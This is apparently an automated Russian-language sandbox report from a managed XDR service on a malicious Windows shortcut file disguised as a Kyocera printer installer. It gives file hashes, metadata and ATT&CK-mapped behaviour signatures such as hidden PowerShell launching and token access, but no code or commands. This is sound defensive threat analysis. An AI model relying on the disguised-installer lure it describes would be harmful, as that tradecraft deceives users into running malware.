Managed XDR

c-users-user-appdata-l...esora-kyocera-2023.lnk — отчёт о динамическом анализе вредоносного файла

Информация о файле

Имя файла
c-users-user-appdata-local-temp-40vdhut3.d43-addprinters_2023-portugal-instalacion-impresora-kyocera-2023.lnk
Тип файла
MS Windows shortcut, Item id list present, Points to a file or directory, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Wed May 18 13:23:29 2016, mtime=Wed May 18 13:23:29 2016, atime=Wed Oct 29 02:16:41 2014, length=478720, window=hide
Размер файла
1.1 KB
Первое обнаружение
Последнее обнаружение

Окружение

win7/x86 en

Хеши

SHA1
f921fd06fcabdd3f99109f10c704e72fe08f7259
SHA256
9510341262b415a3a792ab5f875beaa1f4f43c5de78a077775a29b35b66d87a3
MD5
a0741c15bec8f65a0937a8ce44fb991a

Сигнатуры

Execution

T1059.001 suspicious_powershell: Creates suspicious powershell process
T1059.001 suspicious_process: Spawns a suspicious process

Privilege Escalation

T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process

Defense Evasion

T1134 opens_thread_token: Opens the access token associated with a thread
T1134 opens_process_token: Opens the access token associated with a process

Other

yara_rules: Static rules
unexpected_exception: Unexpected exception
creates_suspended_process: Creates suspended process
get_policy_info: Retrieves information about a Policy object
Managed XDR